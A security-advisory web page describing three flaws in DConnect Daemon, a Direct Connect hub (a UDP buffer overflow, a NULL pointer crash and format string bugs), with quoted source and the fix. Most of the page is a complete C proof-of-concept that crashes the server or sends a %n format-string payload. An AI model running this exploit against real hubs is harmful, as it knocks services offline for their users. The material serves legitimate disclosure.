Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	DConnect Daemon Multiple Vulnerabilities 7 Aug. 2006    Summary DConnect Daemon is "a Direct Connect's hub working as daemon". Multiple vulnerabilities have been found in DConnect Daemon allowing remote attackers to overflow an internal buffer, cause a NULL pointer to be used, and attack using a format string various functions.   Credit: The information has been provided by Luigi Auriemma. The original article can be found at: http://aluigi.altervista.org/adv/dconnx-adv.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * DConnect Daemon version 0.7.0 and prior  * DConnect Daemon CVS 30 Jul 2006 and prior A] listen_thread_udp buffer-overflow The main function which handles the UDP packets is affected by a buffer-overflow vulnerability which happens when a nickname longer than 32 (NICK_LEN) chars is received. The UDP port is disabled by default, the min_slots parameter in dcd.conf must be enabled for using this service. From main.c: void listen_thread_udp(void *args)     ...     char *ip=NULL, bufor[10001], *cmd=NULL, *nick=NULL, *s_slots=NULL, *__strtok_temp__=NULL, nick_prev[NICK_LEN], *filename;     ...         if (!i)nick_prev[0]=0;         else strcpy(nick_prev,nick);     ... B] dc_chat NULL pointer The dc_chat function used for handling the messages received from the clients leads to a crash caused by usr->nick which points to NULL if the client has not sent its nickname yet (so it's enough to send a message as first command for exploiting this bug). From cmd.dc.c: void dc_chat(dc_param_t *param) {     userrec_t *usr = param->usr;     ...     if (strcmp(cmd,usr->nick))     ... C] Various format string bugs (privileges needed) privmsg and pubmsg are two functions used to send messages to one or more users. Both the functions require a format argument (like printf) which is missed in some parts of the code. These format string vulnerabilities can be exploited only if the attacker has superior user or administrator privileges. From cmd.user.c: void chat_msg(chat_param_t *param)     ...     if (user[n]!=usr) pubmsg(user[n],msg);     ... void chat_msg_all(chat_param_t *param)     ...     pubmsg(NULL,par);     ... void chat_msg_prv(chat_param_t *param)     ...     if (user[n]!=usr) privmsg(user[n],NULL,msg);     ... void chat_msg_prv_all(chat_param_t *param)     ...     privmsg(NULL,NULL,msg);     ... From penalties.c: void penalprvmsg(userrec_t *to, char *op, char *fmt, ...)     ...     privmsg(to,op,str);     ... From cmd.dc.c: void dc_OpForceMove(dc_param_t *param)     ...     privmsg(usr,NULL,msg);     ... Solution: CVS 31 Jul 2006:   cvs -d:pserver:anonymous@cvs.ds.pg.gda.pl:/home/cvsroot get dc-hub Exploit: /* by Luigi Auriemma - http://aluigi.org/poc/dconnx.zip */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <time.h> #ifdef WIN32     #include <winsock.h>     #include "winerr.h"     #define close closesocket     #define sleep Sleep     #define ONESEC 1000 #else     #include <unistd.h>     #include <sys/socket.h>     #include <sys/types.h>     #include <arpa/inet.h>     #include <netinet/in.h>     #include <netdb.h>     #define ONESEC 1     #define strnicmp strncasecmp #endif #define VER "0.1" #define PORT 411 #define BUFFSZ 8192 #define BOFSZ 400 // total pck size is 10000 void dcsend(int sd, u_char *cmd); void dcrecv(int sd, u_char *buff, int size); void delimit(u_char *p); void show_dc_users(u_char *data, u_char *mynick); u_int resolv(char *host); void std_err(void); int main(int argc, char *argv[]) {     struct sockaddr_in peer;     u_int seed;     int sd,             attack,             i,             len;     u_short port = PORT;     u_char *buff,             nick[33],             dnick[33],             pass[33],             key[128]; #ifdef WIN32     WSADATA wsadata;     WSAStartup(MAKEWORD(1,0), &wsadata); #endif     setbuf(stdout, NULL);     fputs("\n"         "DConnect Daemon <= 0.7.0 and CVS 30 Jul 2006 multiple vulnerabilities "VER"\n"         "by Luigi Auriemma\n"         "e-mail: aluigi@autistici.org\n"         "web: aluigi.org\n"         "\n", stdout);     if(argc < 3) {         printf("\n"             "Usage: %s <attack> <host> [port(%hu)]\n"             "\n"             "Attacks:\n"             " 1 = listen_thread_udp buffer-overflow\n"             " 2 = dc_chat NULL pointer\n"             " 3 = various format string bugs (privileges needed)\n"             "\n", argv[0], port);         exit(1);     }     attack = atoi(argv[1]);     if(argc > 3) port = atoi(argv[3]);     peer.sin_addr.s_addr = resolv(argv[2]);     peer.sin_port = htons(port);     peer.sin_family = AF_INET;     printf("- target %s : %hu\n",         inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));     buff = malloc(BUFFSZ);     if(!buff) std_err();     seed = time(NULL);     sprintf(nick, "nick%u", ~seed);     for(i = 0; i < (sizeof(key) - 1); i++) {         seed = (seed * 0x343FD) + 0x269EC3;         key[i] = seed;         if(!key[i]) key[i] = 1;     }     key[i] = 0;     if(attack == 1) {         sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);         if(sd < 0) std_err();         len = sprintf(buff,             "$SR nickname%0*u filename" "\x05" "3/9",             BOFSZ,             seed);         printf(             "- send buffer-overflow packet (%d bytes for a buffer of 32)\n"             " Note that the min_slots parameter in the server must be enabled\n",             BOFSZ);         if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))           < 0) std_err();         goto check;     }     sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);     if(sd < 0) std_err();     printf("- connect to server: ");     if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))       < 0) std_err();     printf("ok\n");     do {         dcrecv(sd, buff, BUFFSZ);     } while(strnicmp(buff, "$Lock ", 6));     if(attack == 2) {         sprintf(buff, "<%s> message|", nick);         dcsend(sd, buff);         goto check;     }     sprintf(buff, "$Key %s|", key);     dcsend(sd, buff);     if(attack == 3) {         printf("- insert the nickanme of the superior user or the administrator:\n ");         fflush(stdin);         fgets(nick, sizeof(nick), stdin);         delimit(nick);         printf("- insert the required password:\n ");         fflush(stdin);         fgets(pass, sizeof(pass), stdin);         delimit(pass);     }     sprintf(buff, "$ValidateNick %s|", nick);     dcsend(sd, buff);     if(attack == 3) {         sprintf(buff, "$MyPass %s|", pass);         dcsend(sd, buff);     }     do {         dcrecv(sd, buff, BUFFSZ);     } while(strnicmp(buff, "$Hello ", 7));     sprintf(buff, "$MyINFO $ALL %s description$ $Cable" "\x01" "$email$800000000$|", nick);     dcsend(sd, buff);     do {         dcrecv(sd, buff, BUFFSZ);     } while(strnicmp(buff, "$MyINFO ", 8));     if(attack == 3) {         sprintf(buff, "$GetNickList |");         dcsend(sd, buff);         do {             dcrecv(sd, buff, BUFFSZ);         } while(strnicmp(buff, "$NickList ", 10));         printf("- insert the nickname of another user from the list below:\n");         show_dc_users(buff, nick);         printf(" ");         fflush(stdin);         fgets(dnick, sizeof(dnick), stdin);         delimit(dnick);         sprintf(buff, "<%s> #msg %s %%n%%n%%n%%n%%n%%n%%n|", nick, dnick);         dcsend(sd, buff); // unfortunately this useful command doesn't work for unknown reasons... // sprintf(buff, "<%s> #msg_all %%n%%n%%n%%n%%n%%n%%n|", nick); // dcsend(sd, buff);     } check:     sleep(ONESEC);     close(sd);     sleep(ONESEC);     sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);     if(sd < 0) std_err();     printf("- check server:\n");     if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {         printf("\n Server IS vulnerable!!!\n\n");     } else {         printf("\n Server doesn't seem vulnerable\n\n");     }     close(sd);     return(0); } void dcsend(int sd, u_char *cmd) {     int cmdlen;     u_char *p;     p = strchr(cmd, ' ');     cmdlen = (p) ? (p - cmd) : (strlen(cmd) - 1);     if(cmd[0] == '<') {         printf("- send message\n");     } else {         printf("- send %.*s command\n", cmdlen, cmd);     }     if(send(sd, cmd, strlen(cmd), 0)       < 0) std_err(); } void dcrecv(int sd, u_char *buff, int size) {     int t;     u_char *p;     p = buff;     for(--size; size >= 0; p++, size--) {         t = recv(sd, p, 1, 0);         if(t < 0) std_err();         if(!t) break;         if(*p == '|') break;     }     *p = 0;     printf(": %s\n", buff); } void delimit(u_char *p) {     while(*p && (*p != '\n') && (*p != '\r')) p++;     *p = 0; } void show_dc_users(u_char *data, u_char *mynick) {     u_char *p,             *l;     for(p = strchr(data, ' ') + 1; *p; p++) {         if(*p == '$') continue;         l = strchr(p, '$');         if(!l) break;         *l = 0;         if(!strcmp(p, mynick)) {             printf(" %s (this is your nick and you cannot choose it)\n", p);         } else {             printf(" %s\n", p);         }         p = l;     } } u_int resolv(char *host) {     struct hostent *hp;     u_int host_ip;     host_ip = inet_addr(host);     if(host_ip == INADDR_NONE) {         hp = gethostbyname(host);         if(!hp) {             printf("\nError: Unable to resolv hostname (%s)\n", host);             exit(1);         } else host_ip = *(u_int *)hp->h_addr;     }     return(host_ip); } #ifndef WIN32     void std_err(void) {         perror("\nError");         exit(1);     } #endif  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability Apple QuickTime FLC Delta Decompression Code Execution Vulnerability Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®